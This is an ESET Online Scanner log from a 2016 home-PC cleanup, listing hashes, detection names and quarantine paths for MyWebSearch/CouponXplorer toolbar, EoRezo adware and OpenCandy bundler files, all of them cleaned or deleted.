sh=DEEB8F25483B404367C4E3068B81B8F9736D0C93 ft=1 fh=c6337ca3d00a8554 vn="a variant of Win32/Toolbar.MyWebSearch.Q potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEZSETP.dll.vir"
sh=FBCEA2105E097BC11ED144BE6CA2578BE2657E23 ft=1 fh=d85b5eae63d39f3a vn="Win32/Toolbar.MyWebSearch potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\NP5zEISb.dll.vir"
sh=E8233769C754D5BCBB157625FEFF5D52ACD2F12E ft=1 fh=2dada1fe5e5925e6 vn="a variant of Win32/Adware.EoRezo.BG application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\dply_en_015020180\predm.exe.vir"
sh=24656AA1C6AF207E7A6AFE58E8B9554FBAA925F2 ft=1 fh=d954335ab3899f37 vn="a variant of Win32/Adware.EoRezo.AJ application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\updply_en_015020180.exe.vir"
sh=8F4332686FB2009630B0F4BF8B741DB1B69A2F81 ft=1 fh=7116b6357690bbcf vn="multiple threats" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\Download\myoffergroup_us6.exe.vir"
sh=0A6805E3DA41FD179A7ED96A555FFB189D585AF7 ft=1 fh=5f407552440fae4d vn="a variant of Win32/Toolbar.MyWebSearch.R potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\LocalLow\CouponXplorer_5zEI\Installr\Cache\1564E60F.exe.vir"
sh=AEFB6E46ACC4720555F4EBF9A90C9239DFEAF1BC ft=1 fh=1b346a667a3d96de vn="a variant of Win32/AdkDLLWrapper.A potentially unwanted application" ac=I fn="C:\Users\levilaing\Downloads\BitTorrent.exe"
sh=7397181892470061CBFFF440505149E38063A4F4 ft=1 fh=f85a4e889e8ecfe6 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="C:\Users\levilaing\Downloads\clipgrab-3.4.3.exe"
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=init
# utc_time=2016-03-10 01:20:35
# local_time=2016-03-10 07:20:35 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28515
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=updated
# utc_time=2016-03-10 01:21:21
# local_time=2016-03-10 07:21:21 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# engine=28515
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2016-03-10 05:54:18
# local_time=2016-03-10 11:54:18 (-0600, Central Standard Time)
# country="United States"
# lang=1033
# osver=6.2.9200 NT
# compatibility_mode_1='Norton Security'
# compatibility_mode=3604 16777213 100 97 1636519 49413384 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 7066928 10521401 0 0
# scanned=250784
# found=50
# cleaned=50
# scan_time=16377
sh=1A561004F779C2C90442B67289372563F7D3030B ft=1 fh=0f13f5e05ae936b5 vn="Win32/Toolbar.MyWebSearch.T potentially unwanted application (cleaned by deleting)" ac=C fn="C:\FRST\Quarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll.xBAD"
sh=99DF98DFEF4B483889FA88162D20EE46340A5DBE ft=1 fh=e6e2c196b2ffcb6f vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zauxstb.dll.vir"
sh=0FF3588ECB69D2B18C6FAEC012672CA2F60314F6 ft=1 fh=731190b7425307d6 vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbprtct.dll.vir"
sh=0F78FE90AF015B0A511EDE007BD1791A341E891E ft=1 fh=d4fd6df3b7cf992d vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrmon.exe.vir"
sh=12FF3195BDACA5482034AAC3C3E132D5ADA421A9 ft=1 fh=982f80d197512813 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrstub.dll.vir"
sh=BAEFCB03679575349E01668C4F0938643BAAA022 ft=1 fh=45ba6b521529362d vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdatact.dll.vir"
sh=0C88EFCFA1C77D597111125A6C031CEB47B18BA7 ft=1 fh=b856def4c7346ea3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdlghk.dll.vir"
sh=8090E240F528004402B29C11E5072BED79D95384 ft=1 fh=73e118282d8d3c4a vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdyn.dll.vir"
sh=2CA2EA6CF1AD1FE87C25D4AB6B1C7729E48C6390 ft=1 fh=a34a8b9082c46c86 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zfeedmg.dll.vir"
sh=9788294F2B8AB28DBAE4C73BB61A6B1200BDD89D ft=1 fh=af8ed8fd644fe8ac vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhighin.exe.vir"
sh=9D54BAF23397E5F1444BC6471052AD234B76FBD3 ft=1 fh=2ab58862c927227b vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhkstub.dll.vir"
sh=978867B422339E68971E56C49C66F14F2ACD745D ft=1 fh=dd289cd2c7a55037 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhttpct.dll.vir"
sh=DC971C75FFCE77CC952FB6660A2603E09D62D4D9 ft=1 fh=ac2f97e786bfc982 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zidle.dll.vir"
sh=92AC05FFF3AD68271062A3DCB87E12EE6B816DDB ft=1 fh=acec1e59f99ab2fd vn="a variant of Win32/Toolbar.MyWebSearch.P potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zieovr.dll.vir"
sh=AFCAAC5845D81A407C63733E4A7D007167F96BE8 ft=1 fh=02b0c8de8c8e9f1e vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zimpipe.exe.vir"
sh=556C4FCA5D890F17B7B5040A601B42452A205E29 ft=1 fh=0f2a31b21601aeb5 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmedint.exe.vir"
sh=3EB4A6A25199E6339EC04F36189C71738DE63CE7 ft=1 fh=eafb3b5bfaf84345 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmlbtn.dll.vir"
sh=DFD07B722E317D1CDDAAB7D5B31BFAB57CC5E739 ft=1 fh=507b4871517a4ad4 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmsg.dll.vir"
sh=CBF93E0F6FF8AE054C18BDBE477CBFAF9F467CF9 ft=1 fh=f7d96c65ea0021a5 vn="a variant of Win32/Toolbar.MyWebSearch potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zPlugin.dll.vir"
sh=77C8DC985373B1E5D9035ECB3A831C7DD1ABFD55 ft=1 fh=e1f880731de07609 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zradio.dll.vir"
sh=C5F26031D5E0C487BFF0D60AA44603135BF60395 ft=1 fh=a846ae5344ec78c3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregfft.dll.vir"
sh=A2F202F68FEF2A31E9FE3AE124A46B908349778C ft=1 fh=bf17c6b7704b10fd vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zreghk.dll.vir"
sh=65D604A070334183E5034CDEEC5838E46D705794 ft=1 fh=3d9a604351eb1640 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregiet.dll.vir"
sh=72E48F7F37E208A52AD975EAECAB29FC50223C27 ft=1 fh=958a563919bf5cc2 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zscript.dll.vir"
sh=857980A7B7AB77FF8E34A090CCD76B8BA628E7E4 ft=1 fh=6c9ac10ea3ee1cdd vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskin.dll.vir"
sh=496310EE0816B49176E03226DB102FAE9AA452B4 ft=1 fh=ceffc168909c0690 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zsknlcr.dll.vir"
sh=F5946D49A70A64072739370E7BAD592FE4799EA1 ft=1 fh=5bc3efb780caf8fa vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskplay.exe.vir"
sh=BE21D76E502D546B2D88093E13F07923EB59380B ft=1 fh=7424967c664ed914 vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrcAs.dll.vir"
sh=8ACE75F6C2417666AD9D60837B72D78B394C3944 ft=1 fh=ae6d89138faf571c vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrchMn.exe.vir"
sh=110033F4A78DCA521E8BA73F75747E4E3B6AE545 ft=1 fh=21686246ae128bdd vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zuabtn.dll.vir"
sh=630D5FC9ACC4932C87263895F554F8C3CB6D4B4A ft=1 fh=b81ce565a99a556c vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegrator64.exe.vir"
sh=374E378A91209732B48C8416D1E9805E98FDCFA9 ft=1 fh=6da58ad1308c1c96 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegratorStub64.dll.vir"
sh=6902D246F8FC2457C9AE369B094292DE6EB454BC ft=1 fh=b1be847bff3fcf8f vn="a variant of Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CREXT.DLL.vir"
sh=FF9F058B12B6C4D9B6256304FA9078E391C7F32C ft=1 fh=6022d103b074fe9f vn="a variant of Win32/Toolbar.MyWebSearch.Z potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CrExtP5z.exe.vir"
sh=244414D9D39E114E7989C3B35A5FF038508ECFC1 ft=1 fh=0cbd734d892ac7d4 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\DPNMNGR.DLL.vir"
sh=6FF50369661027A1CD5F5E465F78C78913FF84CC ft=1 fh=c941e5f2ec9d2835 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\EXEMANAGER.DLL.vir"
sh=3D7CD376DFDB97512A376E85FBB7F04344C051B6 ft=1 fh=e0ed2601e18686d8 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\Hpg64.dll.vir"
sh=2F938D8C9A5D3C9C239793346D43193BA1CBFCD6 ft=1 fh=929bde520a5aa0d2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTEX.DLL.vir"
sh=B8944722E8D577E67925DD4A72D1D8E44C3BC6CA ft=1 fh=6f8a20cf4b11d7b0 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTPEX.DLL.vir"
sh=2E85C71E79C5B2A65D8CCDD5B21AFE559102062F ft=1 fh=68336e5d9907ad1c vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8TICKER.DLL.vir"
sh=D0787BEAE97CE99982E7F5000772831421FD48E4 ft=1 fh=b650850bda28ebe2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\VERIFY.DLL.vir"
sh=499E228EDD239496AC4401619894F45BEB39CB25 ft=1 fh=11b6a11b071ec76e vn="Win32/Toolbar.MyWebSearch potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEIPlug.dll.vir"
sh=DEEB8F25483B404367C4E3068B81B8F9736D0C93 ft=1 fh=c6337ca3d00a8554 vn="a variant of Win32/Toolbar.MyWebSearch.Q potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEZSETP.dll.vir"
sh=FBCEA2105E097BC11ED144BE6CA2578BE2657E23 ft=1 fh=d85b5eae63d39f3a vn="Win32/Toolbar.MyWebSearch potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\NP5zEISb.dll.vir"
sh=E8233769C754D5BCBB157625FEFF5D52ACD2F12E ft=1 fh=2dada1fe5e5925e6 vn="a variant of Win32/Adware.EoRezo.BG application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\dply_en_015020180\predm.exe.vir"
sh=24656AA1C6AF207E7A6AFE58E8B9554FBAA925F2 ft=1 fh=d954335ab3899f37 vn="a variant of Win32/Adware.EoRezo.AJ application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\updply_en_015020180.exe.vir"
sh=8F4332686FB2009630B0F4BF8B741DB1B69A2F81 ft=1 fh=7116b6357690bbcf vn="multiple threats (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\Download\myoffergroup_us6.exe.vir"
sh=0A6805E3DA41FD179A7ED96A555FFB189D585AF7 ft=1 fh=5f407552440fae4d vn="a variant of Win32/Toolbar.MyWebSearch.R potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\LocalLow\CouponXplorer_5zEI\Installr\Cache\1564E60F.exe.vir"
sh=AEFB6E46ACC4720555F4EBF9A90C9239DFEAF1BC ft=1 fh=1b346a667a3d96de vn="a variant of Win32/AdkDLLWrapper.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Users\levilaing\Downloads\BitTorrent.exe"
sh=7397181892470061CBFFF440505149E38063A4F4 ft=1 fh=f85a4e889e8ecfe6 vn="Win32/OpenCandy potentially unsafe application (deleted)" ac=C fn="C:\Users\levilaing\Downloads\clipgrab-3.4.3.exe"
 

